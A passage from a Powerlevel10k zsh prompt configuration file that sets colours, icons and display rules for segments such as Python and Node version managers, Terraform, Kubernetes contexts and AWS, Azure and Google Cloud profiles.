typeset -g POWERLEVEL9K_CONTEXT_{REMOTE,REMOTE_SUDO}_FOREGROUND=3
typeset -g POWERLEVEL9K_CONTEXT_{REMOTE,REMOTE_SUDO}_BACKGROUND=0
# Default context color (no privileges, no SSH).
typeset -g POWERLEVEL9K_CONTEXT_FOREGROUND=3
typeset -g POWERLEVEL9K_CONTEXT_BACKGROUND=0
# Context format when running with privileges: user@hostname.
typeset -g POWERLEVEL9K_CONTEXT_ROOT_TEMPLATE='%n@%m'
# Context format when in SSH without privileges: user@hostname.
typeset -g POWERLEVEL9K_CONTEXT_{REMOTE,REMOTE_SUDO}_TEMPLATE='%n@%m'
# Default context format (no privileges, no SSH): user@hostname.
typeset -g POWERLEVEL9K_CONTEXT_TEMPLATE='%n@%m'
# Don't show context unless running with privileges or in SSH.
# Tip: Remove the next line to always show context.
typeset -g POWERLEVEL9K_CONTEXT_{DEFAULT,SUDO}_{CONTENT,VISUAL_IDENTIFIER}_EXPANSION=
# Custom icon.
# typeset -g POWERLEVEL9K_CONTEXT_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Custom prefix.
# typeset -g POWERLEVEL9K_CONTEXT_PREFIX='with '
###[ virtualenv: python virtual environment (https://docs.python.org/3/library/venv.html) ]###
# Python virtual environment color.
# typeset -g POWERLEVEL9K_VIRTUALENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_VIRTUALENV_BACKGROUND=4
# Don't show Python version next to the virtual environment name.
typeset -g POWERLEVEL9K_VIRTUALENV_SHOW_PYTHON_VERSION=false
# If set to "false", won't show virtualenv if pyenv is already shown.
# If set to "if-different", won't show virtualenv if it's the same as pyenv.
typeset -g POWERLEVEL9K_VIRTUALENV_SHOW_WITH_PYENV=false
# Separate environment name from Python version only with a space.
typeset -g POWERLEVEL9K_VIRTUALENV_{LEFT,RIGHT}_DELIMITER=
# Custom icon.
# typeset -g POWERLEVEL9K_VIRTUALENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
#####################[ anaconda: conda environment (https://conda.io/) ]######################
# Anaconda environment color.
# typeset -g POWERLEVEL9K_ANACONDA_FOREGROUND=0
# typeset -g POWERLEVEL9K_ANACONDA_BACKGROUND=4
# Anaconda segment format. The following parameters are available within the expansion.
#
# - CONDA_PREFIX Absolute path to the active Anaconda/Miniconda environment.
# - CONDA_DEFAULT_ENV Name of the active Anaconda/Miniconda environment.
# - CONDA_PROMPT_MODIFIER Configurable prompt modifier (see below).
# - P9K_ANACONDA_PYTHON_VERSION Current python version (python --version).
#
# CONDA_PROMPT_MODIFIER can be configured with the following command:
#
# conda config --set env_prompt '({default_env}) '
#
# The last argument is a Python format string that can use the following variables:
#
# - prefix The same as CONDA_PREFIX.
# - default_env The same as CONDA_DEFAULT_ENV.
# - name The last segment of CONDA_PREFIX.
# - stacked_env Comma-separated list of names in the environment stack. The first element is
# always the same as default_env.
#
# Note: '({default_env}) ' is the default value of env_prompt.
#
# The default value of POWERLEVEL9K_ANACONDA_CONTENT_EXPANSION expands to $CONDA_PROMPT_MODIFIER
# without the surrounding parentheses, or to the last path component of CONDA_PREFIX if the former
# is empty.
typeset -g POWERLEVEL9K_ANACONDA_CONTENT_EXPANSION='${${${${CONDA_PROMPT_MODIFIER#\(}% }%\)}:-${CONDA_PREFIX:t}}'
# Custom icon.
# typeset -g POWERLEVEL9K_ANACONDA_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ pyenv: python environment (https://github.com/pyenv/pyenv) ]################
# Pyenv color.
# typeset -g POWERLEVEL9K_PYENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_PYENV_BACKGROUND=4
# Hide python version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_PYENV_SOURCES=(shell local global)
# If set to false, hide python version if it's the same as global:
# $(pyenv version-name) == $(pyenv global).
typeset -g POWERLEVEL9K_PYENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide python version if it's equal to "system".
typeset -g POWERLEVEL9K_PYENV_SHOW_SYSTEM=true
# Pyenv segment format. The following parameters are available within the expansion.
#
# - P9K_CONTENT Current pyenv environment (pyenv version-name).
# - P9K_PYENV_PYTHON_VERSION Current python version (python --version).
#
# The default format has the following logic:
#
# 1. Display "$P9K_CONTENT $P9K_PYENV_PYTHON_VERSION" if $P9K_PYENV_PYTHON_VERSION is not
# empty and unequal to $P9K_CONTENT.
# 2. Otherwise display just "$P9K_CONTENT".
typeset -g POWERLEVEL9K_PYENV_CONTENT_EXPANSION='${P9K_CONTENT}${${P9K_PYENV_PYTHON_VERSION:#$P9K_CONTENT}:+ $P9K_PYENV_PYTHON_VERSION}'
# Custom icon.
# typeset -g POWERLEVEL9K_PYENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ goenv: go environment (https://github.com/syndbg/goenv) ]################
# Goenv color.
# typeset -g POWERLEVEL9K_GOENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_GOENV_BACKGROUND=4
# Hide go version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_GOENV_SOURCES=(shell local global)
# If set to false, hide go version if it's the same as global:
# $(goenv version-name) == $(goenv global).
typeset -g POWERLEVEL9K_GOENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide go version if it's equal to "system".
typeset -g POWERLEVEL9K_GOENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_GOENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ nodenv: node.js version from nodenv (https://github.com/nodenv/nodenv) ]##########
# Nodenv color.
# typeset -g POWERLEVEL9K_NODENV_FOREGROUND=2
# typeset -g POWERLEVEL9K_NODENV_BACKGROUND=0
# Hide node version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_NODENV_SOURCES=(shell local global)
# If set to false, hide node version if it's the same as global:
# $(nodenv version-name) == $(nodenv global).
typeset -g POWERLEVEL9K_NODENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide node version if it's equal to "system".
typeset -g POWERLEVEL9K_NODENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_NODENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##############[ nvm: node.js version from nvm (https://github.com/nvm-sh/nvm) ]###############
# Nvm color.
# typeset -g POWERLEVEL9K_NVM_FOREGROUND=0
# typeset -g POWERLEVEL9K_NVM_BACKGROUND=5
# Custom icon.
# typeset -g POWERLEVEL9K_NVM_VISUAL_IDENTIFIER_EXPANSION='⭐'
############[ nodeenv: node.js environment (https://github.com/ekalinin/nodeenv) ]############
# Nodeenv color.
# typeset -g POWERLEVEL9K_NODEENV_FOREGROUND=2
# typeset -g POWERLEVEL9K_NODEENV_BACKGROUND=0
# Don't show Node version next to the environment name.
typeset -g POWERLEVEL9K_NODEENV_SHOW_NODE_VERSION=false
# Separate environment name from Node version only with a space.
typeset -g POWERLEVEL9K_NODEENV_{LEFT,RIGHT}_DELIMITER=
# Custom icon.
# typeset -g POWERLEVEL9K_NODEENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##############################[ node_version: node.js version ]###############################
# Node version color.
# typeset -g POWERLEVEL9K_NODE_VERSION_FOREGROUND=7
# typeset -g POWERLEVEL9K_NODE_VERSION_BACKGROUND=2
# Show node version only when in a directory tree containing package.json.
typeset -g POWERLEVEL9K_NODE_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_NODE_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######################[ go_version: go version (https://golang.org) ]########################
# Go version color.
# typeset -g POWERLEVEL9K_GO_VERSION_FOREGROUND=255
# typeset -g POWERLEVEL9K_GO_VERSION_BACKGROUND=2
# Show go version only when in a go project subdirectory.
typeset -g POWERLEVEL9K_GO_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_GO_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#################[ rust_version: rustc version (https://www.rust-lang.org) ]##################
# Rust version color.
# typeset -g POWERLEVEL9K_RUST_VERSION_FOREGROUND=0
# typeset -g POWERLEVEL9K_RUST_VERSION_BACKGROUND=208
# Show rust version only when in a rust project subdirectory.
typeset -g POWERLEVEL9K_RUST_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_RUST_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
###############[ dotnet_version: .NET version (https://dotnet.microsoft.com) ]################
# .NET version color.
# typeset -g POWERLEVEL9K_DOTNET_VERSION_FOREGROUND=7
# typeset -g POWERLEVEL9K_DOTNET_VERSION_BACKGROUND=5
# Show .NET version only when in a .NET project subdirectory.
typeset -g POWERLEVEL9K_DOTNET_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_DOTNET_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#####################[ php_version: php version (https://www.php.net/) ]######################
# PHP version color.
typeset -g POWERLEVEL9K_PHP_VERSION_FOREGROUND=0
typeset -g POWERLEVEL9K_PHP_VERSION_BACKGROUND=5
# Show PHP version only when in a PHP project subdirectory.
typeset -g POWERLEVEL9K_PHP_VERSION_PROJECT_ONLY=true
# Custom icon.
# typeset -g POWERLEVEL9K_PHP_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ laravel_version: laravel php framework version (https://laravel.com/) ]###########
# Laravel version color.
typeset -g POWERLEVEL9K_LARAVEL_VERSION_FOREGROUND=1
typeset -g POWERLEVEL9K_LARAVEL_VERSION_BACKGROUND=7
# Custom icon.
# typeset -g POWERLEVEL9K_LARAVEL_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
#############[ rbenv: ruby version from rbenv (https://github.com/rbenv/rbenv) ]##############
# Rbenv color.
# typeset -g POWERLEVEL9K_RBENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_RBENV_BACKGROUND=1
# Hide ruby version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_RBENV_SOURCES=(shell local global)
# If set to false, hide ruby version if it's the same as global:
# $(rbenv version-name) == $(rbenv global).
typeset -g POWERLEVEL9K_RBENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide ruby version if it's equal to "system".
typeset -g POWERLEVEL9K_RBENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_RBENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
####################[ java_version: java version (https://www.java.com/) ]####################
# Java version color.
typeset -g POWERLEVEL9K_JAVA_VERSION_FOREGROUND=1
typeset -g POWERLEVEL9K_JAVA_VERSION_BACKGROUND=7
# Show java version only when in a java project subdirectory.
typeset -g POWERLEVEL9K_JAVA_VERSION_PROJECT_ONLY=true
# Show brief version.
typeset -g POWERLEVEL9K_JAVA_VERSION_FULL=false
# Custom icon.
# typeset -g POWERLEVEL9K_JAVA_VERSION_VISUAL_IDENTIFIER_EXPANSION='⭐'
###[ package: name@version from package.json (https://docs.npmjs.com/files/package.json) ]####
# Package color.
# typeset -g POWERLEVEL9K_PACKAGE_FOREGROUND=0
# typeset -g POWERLEVEL9K_PACKAGE_BACKGROUND=6
# Package format. The following parameters are available within the expansion.
#
# - P9K_PACKAGE_NAME The value of `name` field in package.json.
# - P9K_PACKAGE_VERSION The value of `version` field in package.json.
#
# typeset -g POWERLEVEL9K_PACKAGE_CONTENT_EXPANSION='${P9K_PACKAGE_NAME//\%/%%}@${P9K_PACKAGE_VERSION//\%/%%}'
# Custom icon.
# typeset -g POWERLEVEL9K_PACKAGE_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######################[ rvm: ruby version from rvm (https://rvm.io) ]########################
# Rvm color.
# typeset -g POWERLEVEL9K_RVM_FOREGROUND=0
# typeset -g POWERLEVEL9K_RVM_BACKGROUND=240
# Don't show @gemset at the end.
typeset -g POWERLEVEL9K_RVM_SHOW_GEMSET=false
# Don't show ruby- at the front.
typeset -g POWERLEVEL9K_RVM_SHOW_PREFIX=false
# Custom icon.
# typeset -g POWERLEVEL9K_RVM_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ fvm: flutter version management (https://github.com/leoafarias/fvm) ]############
# Fvm color.
# typeset -g POWERLEVEL9K_FVM_FOREGROUND=0
# typeset -g POWERLEVEL9K_FVM_BACKGROUND=4
# Custom icon.
# typeset -g POWERLEVEL9K_FVM_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ luaenv: lua version from luaenv (https://github.com/cehoffman/luaenv) ]###########
# Lua color.
# typeset -g POWERLEVEL9K_LUAENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_LUAENV_BACKGROUND=4
# Hide lua version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_LUAENV_SOURCES=(shell local global)
# If set to false, hide lua version if it's the same as global:
# $(luaenv version-name) == $(luaenv global).
typeset -g POWERLEVEL9K_LUAENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide lua version if it's equal to "system".
typeset -g POWERLEVEL9K_LUAENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_LUAENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
###############[ jenv: java version from jenv (https://github.com/jenv/jenv) ]################
# Java color.
# typeset -g POWERLEVEL9K_JENV_FOREGROUND=1
# typeset -g POWERLEVEL9K_JENV_BACKGROUND=7
# Hide java version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_JENV_SOURCES=(shell local global)
# If set to false, hide java version if it's the same as global:
# $(jenv version-name) == $(jenv global).
typeset -g POWERLEVEL9K_JENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide java version if it's equal to "system".
typeset -g POWERLEVEL9K_JENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_JENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ plenv: perl version from plenv (https://github.com/tokuhirom/plenv) ]############
# Perl color.
# typeset -g POWERLEVEL9K_PLENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_PLENV_BACKGROUND=4
# Hide perl version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_PLENV_SOURCES=(shell local global)
# If set to false, hide perl version if it's the same as global:
# $(plenv version-name) == $(plenv global).
typeset -g POWERLEVEL9K_PLENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide perl version if it's equal to "system".
typeset -g POWERLEVEL9K_PLENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_PLENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
############[ phpenv: php version from phpenv (https://github.com/phpenv/phpenv) ]############
# PHP color.
# typeset -g POWERLEVEL9K_PHPENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_PHPENV_BACKGROUND=5
# Hide php version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_PHPENV_SOURCES=(shell local global)
# If set to false, hide php version if it's the same as global:
# $(phpenv version-name) == $(phpenv global).
typeset -g POWERLEVEL9K_PHPENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide PHP version if it's equal to "system".
typeset -g POWERLEVEL9K_PHPENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_PHPENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######[ scalaenv: scala version from scalaenv (https://github.com/scalaenv/scalaenv) ]#######
# Scala color.
# typeset -g POWERLEVEL9K_SCALAENV_FOREGROUND=0
# typeset -g POWERLEVEL9K_SCALAENV_BACKGROUND=1
# Hide scala version if it doesn't come from one of these sources.
typeset -g POWERLEVEL9K_SCALAENV_SOURCES=(shell local global)
# If set to false, hide scala version if it's the same as global:
# $(scalaenv version-name) == $(scalaenv global).
typeset -g POWERLEVEL9K_SCALAENV_PROMPT_ALWAYS_SHOW=false
# If set to false, hide scala version if it's equal to "system".
typeset -g POWERLEVEL9K_SCALAENV_SHOW_SYSTEM=true
# Custom icon.
# typeset -g POWERLEVEL9K_SCALAENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ haskell_stack: haskell version from stack (https://haskellstack.org/) ]###########
# Haskell color.
# typeset -g POWERLEVEL9K_HASKELL_STACK_FOREGROUND=0
# typeset -g POWERLEVEL9K_HASKELL_STACK_BACKGROUND=3
# Hide haskell version if it doesn't come from one of these sources.
#
# shell: version is set by STACK_YAML
# local: version is set by stack.yaml up the directory tree
# global: version is set by the implicit global project (~/.stack/global-project/stack.yaml)
typeset -g POWERLEVEL9K_HASKELL_STACK_SOURCES=(shell local)
# If set to false, hide haskell version if it's the same as in the implicit global project.
typeset -g POWERLEVEL9K_HASKELL_STACK_ALWAYS_SHOW=true
# Custom icon.
# typeset -g POWERLEVEL9K_HASKELL_STACK_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ terraform: terraform workspace (https://www.terraform.io) ]#################
# Don't show terraform workspace if it's literally "default".
typeset -g POWERLEVEL9K_TERRAFORM_SHOW_DEFAULT=false
# POWERLEVEL9K_TERRAFORM_CLASSES is an array with even number of elements. The first element
# in each pair defines a pattern against which the current terraform workspace gets matched.
# More specifically, it's P9K_CONTENT prior to the application of context expansion (see below)
# that gets matched. If you unset all POWERLEVEL9K_TERRAFORM_*CONTENT_EXPANSION parameters,
# you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_TERRAFORM_CLASSES defines the workspace class. Patterns are tried in order. The
# first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_TERRAFORM_CLASSES=(
# '*prod*' PROD
# '*test*' TEST
# '*' OTHER)
#
# If your current terraform workspace is "project_test", its class is TEST because "project_test"
# doesn't match the pattern '*prod*' but does match '*test*'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_FOREGROUND=2
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_BACKGROUND=0
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_TERRAFORM_TEST_CONTENT_EXPANSION='> ${P9K_CONTENT} <'
typeset -g POWERLEVEL9K_TERRAFORM_CLASSES=(
# '*prod*' PROD # These values are examples that are unlikely
# '*test*' TEST # to match your needs. Customize them as needed.
'*' OTHER)
typeset -g POWERLEVEL9K_TERRAFORM_OTHER_FOREGROUND=4
typeset -g POWERLEVEL9K_TERRAFORM_OTHER_BACKGROUND=0
# typeset -g POWERLEVEL9K_TERRAFORM_OTHER_VISUAL_IDENTIFIER_EXPANSION='⭐'
#############[ kubecontext: current kubernetes context (https://kubernetes.io/) ]#############
# Show kubecontext only when the the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show kubecontext.
typeset -g POWERLEVEL9K_KUBECONTEXT_SHOW_ON_COMMAND='kubectl|helm|kubens|kubectx|oc|istioctl|kogito|k9s|helmfile'
# Kubernetes context classes for the purpose of using different colors, icons and expansions with
# different contexts.
#
# POWERLEVEL9K_KUBECONTEXT_CLASSES is an array with even number of elements. The first element
# in each pair defines a pattern against which the current kubernetes context gets matched.
# More specifically, it's P9K_CONTENT prior to the application of context expansion (see below)
# that gets matched. If you unset all POWERLEVEL9K_KUBECONTEXT_*CONTENT_EXPANSION parameters,
# you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_KUBECONTEXT_CLASSES defines the context class. Patterns are tried in order. The
# first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_KUBECONTEXT_CLASSES=(
# '*prod*' PROD
# '*test*' TEST
# '*' DEFAULT)
#
# If your current kubernetes context is "deathray-testing/default", its class is TEST
# because "deathray-testing/default" doesn't match the pattern '*prod*' but does match '*test*'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_FOREGROUND=0
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_BACKGROUND=2
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_KUBECONTEXT_TEST_CONTENT_EXPANSION='> ${P9K_CONTENT} <'
typeset -g POWERLEVEL9K_KUBECONTEXT_CLASSES=(
# '*prod*' PROD # These values are examples that are unlikely
# '*test*' TEST # to match your needs. Customize them as needed.
'*' DEFAULT)
typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_FOREGROUND=7
typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_BACKGROUND=5
# typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Use POWERLEVEL9K_KUBECONTEXT_CONTENT_EXPANSION to specify the content displayed by kubecontext
# segment. Parameter expansions are very flexible and fast, too. See reference:
# http://zsh.sourceforge.net/Doc/Release/Expansion.html#Parameter-Expansion.
#
# Within the expansion the following parameters are always available:
#
# - P9K_CONTENT The content that would've been displayed if there was no content
# expansion defined.
# - P9K_KUBECONTEXT_NAME The current context's name. Corresponds to column NAME in the
# output of `kubectl config get-contexts`.
# - P9K_KUBECONTEXT_CLUSTER The current context's cluster. Corresponds to column CLUSTER in the
# output of `kubectl config get-contexts`.
# - P9K_KUBECONTEXT_NAMESPACE The current context's namespace. Corresponds to column NAMESPACE
# in the output of `kubectl config get-contexts`. If there is no
# namespace, the parameter is set to "default".
# - P9K_KUBECONTEXT_USER The current context's user. Corresponds to column AUTHINFO in the
# output of `kubectl config get-contexts`.
#
# If the context points to Google Kubernetes Engine (GKE) or Elastic Kubernetes Service (EKS),
# the following extra parameters are available:
#
# - P9K_KUBECONTEXT_CLOUD_NAME Either "gke" or "eks".
# - P9K_KUBECONTEXT_CLOUD_ACCOUNT Account/project ID.
# - P9K_KUBECONTEXT_CLOUD_ZONE Availability zone.
# - P9K_KUBECONTEXT_CLOUD_CLUSTER Cluster.
#
# P9K_KUBECONTEXT_CLOUD_* parameters are derived from P9K_KUBECONTEXT_CLUSTER. For example,
# if P9K_KUBECONTEXT_CLUSTER is "gke_my-account_us-east1-a_my-cluster-01":
#
# - P9K_KUBECONTEXT_CLOUD_NAME=gke
# - P9K_KUBECONTEXT_CLOUD_ACCOUNT=my-account
# - P9K_KUBECONTEXT_CLOUD_ZONE=us-east1-a
# - P9K_KUBECONTEXT_CLOUD_CLUSTER=my-cluster-01
#
# If P9K_KUBECONTEXT_CLUSTER is "arn:aws:eks:us-east-1:123456789012:cluster/my-cluster-01":
#
# - P9K_KUBECONTEXT_CLOUD_NAME=eks
# - P9K_KUBECONTEXT_CLOUD_ACCOUNT=123456789012
# - P9K_KUBECONTEXT_CLOUD_ZONE=us-east-1
# - P9K_KUBECONTEXT_CLOUD_CLUSTER=my-cluster-01
typeset -g POWERLEVEL9K_KUBECONTEXT_DEFAULT_CONTENT_EXPANSION=
# Show P9K_KUBECONTEXT_CLOUD_CLUSTER if it's not empty and fall back to P9K_KUBECONTEXT_NAME.
POWERLEVEL9K_KUBECONTEXT_DEFAULT_CONTENT_EXPANSION+='${P9K_KUBECONTEXT_CLOUD_CLUSTER:-${P9K_KUBECONTEXT_NAME}}'
# Append the current context's namespace if it's not "default".
POWERLEVEL9K_KUBECONTEXT_DEFAULT_CONTENT_EXPANSION+='${${:-/$P9K_KUBECONTEXT_NAMESPACE}:#/default}'
# Custom prefix.
# typeset -g POWERLEVEL9K_KUBECONTEXT_PREFIX='at '
#[ aws: aws profile (https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-profiles.html) ]#
# Show aws only when the the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show aws.
typeset -g POWERLEVEL9K_AWS_SHOW_ON_COMMAND='aws|awless|terraform|pulumi|terragrunt'
# POWERLEVEL9K_AWS_CLASSES is an array with even number of elements. The first element
# in each pair defines a pattern against which the current AWS profile gets matched.
# More specifically, it's P9K_CONTENT prior to the application of context expansion (see below)
# that gets matched. If you unset all POWERLEVEL9K_AWS_*CONTENT_EXPANSION parameters,
# you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_AWS_CLASSES defines the profile class. Patterns are tried in order. The
# first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_AWS_CLASSES=(
# '*prod*' PROD
# '*test*' TEST
# '*' DEFAULT)
#
# If your current AWS profile is "company_test", its class is TEST
# because "company_test" doesn't match the pattern '*prod*' but does match '*test*'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_AWS_TEST_FOREGROUND=28
# typeset -g POWERLEVEL9K_AWS_TEST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_AWS_TEST_CONTENT_EXPANSION='> ${P9K_CONTENT} <'
typeset -g POWERLEVEL9K_AWS_CLASSES=(
# '*prod*' PROD # These values are examples that are unlikely
# '*test*' TEST # to match your needs. Customize them as needed.
'*' DEFAULT)
# typeset -g POWERLEVEL9K_AWS_DEFAULT_FOREGROUND=7
# typeset -g POWERLEVEL9K_AWS_DEFAULT_BACKGROUND=1
# typeset -g POWERLEVEL9K_AWS_DEFAULT_VISUAL_IDENTIFIER_EXPANSION='⭐'
#[ aws_eb_env: aws elastic beanstalk environment (https://aws.amazon.com/elasticbeanstalk/) ]#
# AWS Elastic Beanstalk environment color.
# typeset -g POWERLEVEL9K_AWS_EB_ENV_FOREGROUND=2
# typeset -g POWERLEVEL9K_AWS_EB_ENV_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_AWS_EB_ENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ azure: azure account name (https://docs.microsoft.com/en-us/cli/azure) ]##########
# Show azure only when the the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show azure.
typeset -g POWERLEVEL9K_AZURE_SHOW_ON_COMMAND='az|terraform|pulumi|terragrunt'
# Azure account name color.
# typeset -g POWERLEVEL9K_AZURE_FOREGROUND=7
# typeset -g POWERLEVEL9K_AZURE_BACKGROUND=4
# Custom icon.
# typeset -g POWERLEVEL9K_AZURE_VISUAL_IDENTIFIER_EXPANSION='⭐'
##########[ gcloud: google cloud account and project (https://cloud.google.com/) ]###########
# Show gcloud only when the the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show gcloud.
typeset -g POWERLEVEL9K_GCLOUD_SHOW_ON_COMMAND='gcloud|gcs'
# Google cloud color.
# typeset -g POWERLEVEL9K_GCLOUD_FOREGROUND=7
# typeset -g POWERLEVEL9K_GCLOUD_BACKGROUND=4
# Google cloud format. Change the value of POWERLEVEL9K_GCLOUD_PARTIAL_CONTENT_EXPANSION and/or
# POWERLEVEL9K_GCLOUD_COMPLETE_CONTENT_EXPANSION if the default is too verbose or not informative
# enough. You can use the following parameters in the expansions. Each of them corresponds to the
# output of `gcloud` tool.
#
# Parameter | Source
# -------------------------|--------------------------------------------------------------------
# P9K_GCLOUD_CONFIGURATION | gcloud config configurations list --format='value(name)'
# P9K_GCLOUD_ACCOUNT | gcloud config get-value account
# P9K_GCLOUD_PROJECT_ID | gcloud config get-value project
# P9K_GCLOUD_PROJECT_NAME | gcloud projects describe $P9K_GCLOUD_PROJECT_ID --format='value(name)'
#
# Note: ${VARIABLE//\%/%%} expands to ${VARIABLE} with all occurrences of '%' replaced with '%%'.
#
# Obtaining project name requires sending a request to Google servers. This can take a long time
# and even fail. When project name is unknown, P9K_GCLOUD_PROJECT_NAME is not set and gcloud
# prompt segment is in state PARTIAL. When project name gets known, P9K_GCLOUD_PROJECT_NAME gets
# set and gcloud prompt segment transitions to state COMPLETE.
#
# You can customize the format, icon and colors of gcloud segment separately for states PARTIAL
# and COMPLETE. You can also hide gcloud in state PARTIAL by setting
# POWERLEVEL9K_GCLOUD_PARTIAL_VISUAL_IDENTIFIER_EXPANSION and
# POWERLEVEL9K_GCLOUD_PARTIAL_CONTENT_EXPANSION to empty.
typeset -g POWERLEVEL9K_GCLOUD_PARTIAL_CONTENT_EXPANSION='${P9K_GCLOUD_PROJECT_ID//\%/%%}'
typeset -g POWERLEVEL9K_GCLOUD_COMPLETE_CONTENT_EXPANSION='${P9K_GCLOUD_PROJECT_NAME//\%/%%}'
# Send a request to Google (by means of `gcloud projects describe ...`) to obtain project name
# this often. Negative value disables periodic polling. In this mode project name is retrieved
# only when the current configuration, account or project id changes.
typeset -g POWERLEVEL9K_GCLOUD_REFRESH_PROJECT_NAME_SECONDS=60
# Custom icon.
# typeset -g POWERLEVEL9K_GCLOUD_VISUAL_IDENTIFIER_EXPANSION='⭐'
#[ google_app_cred: google application credentials (https://cloud.google.com/docs/authentication/production) ]#
# Show google_app_cred only when the the command you are typing invokes one of these tools.
# Tip: Remove the next line to always show google_app_cred.
typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_SHOW_ON_COMMAND='terraform|pulumi|terragrunt'
# Google application credentials classes for the purpose of using different colors, icons and
# expansions with different credentials.
#
# POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES is an array with even number of elements. The first
# element in each pair defines a pattern against which the current kubernetes context gets
# matched. More specifically, it's P9K_CONTENT prior to the application of context expansion
# (see below) that gets matched. If you unset all POWERLEVEL9K_GOOGLE_APP_CRED_*CONTENT_EXPANSION
# parameters, you'll see this value in your prompt. The second element of each pair in
# POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES defines the context class. Patterns are tried in order.
# The first match wins.
#
# For example, given these settings:
#
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_CLASSES=(
# '*:*prod*:*' PROD
# '*:*test*:*' TEST
# '*' DEFAULT)
#
# If your current Google application credentials is "service_account deathray-testing x@y.com",
# its class is TEST because it doesn't match the pattern '* *prod* *' but does match '* *test* *'.
#
# You can define different colors, icons and content expansions for different classes:
#
# typeset -g POWERLEVEL9K_GOOGLE_APP_CRED_TEST_FOREGROUND=28
